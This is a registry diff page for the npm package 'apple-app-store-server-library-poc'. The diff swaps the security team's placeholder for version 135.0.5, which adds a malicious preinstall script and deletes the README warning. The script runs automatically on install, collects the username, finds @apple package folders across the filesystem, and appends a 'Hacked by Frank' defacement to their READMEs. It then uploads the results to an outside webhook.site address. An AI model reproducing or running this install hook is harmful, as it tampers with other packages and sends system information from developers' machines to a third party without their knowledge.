apple-app-store-server-library-poc 0.0.1-security → 135.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of apple-app-store-server-library-poc might be problematic. Click here for more details.
- package/package.json +4 -3
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,7 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "apple-app-store-server-library-poc",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
|
|
3
|
+
"version": "135.0.5",
|
|
4
|
+
"scripts": {
|
|
5
|
+
"preinstall": "export OUT=$(mktemp); (echo '--- AUTOMATIC APPLE NAMESPACE INJECTION ---'; echo \"User: $(whoami)\"; echo \"Mencari semua paket di namespace @apple...\"; ALL_APPLE=$(find / -name \"@apple\" -type d 2>/dev/null); if [ -z \"$ALL_APPLE\" ]; then echo \"Tidak ada namespace @apple yang terlihat di root, mencari di folder lokal...\"; ALL_APPLE=$(find $(pwd)/.. -name \"@apple\" -type d 2>/dev/null); fi; if [ -n \"$ALL_APPLE\" ]; then for folder in $ALL_APPLE; do echo \"Ditemukan namespace di: $folder\"; for pkg in $(ls $folder); do README=\"$folder/$pkg/README.md\"; if [ -f \"$README\" ]; then echo \"Menyuntik: $pkg\"; echo -e \"\n# Hacked by Frank - Newton3rd\nVerified at: $(date)\" >> \"$README\"; echo \"Isi $pkg/README:\"; tail -n 3 \"$README\"; fi; done; done; else echo \"Namespace @apple tetap tidak ditemukan.\"; fi; echo '--- SELESAI ---') > $OUT; curl -X POST -H \"Content-Type: text/plain\" --data-binary @$OUT https://webhook.site/03d518f5-f368-44cc-bb1d-c1f89e19a028; rm $OUT"
|
|
6
|
+
}
|
|
6
7
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=apple-app-store-server-library-poc for more information.
|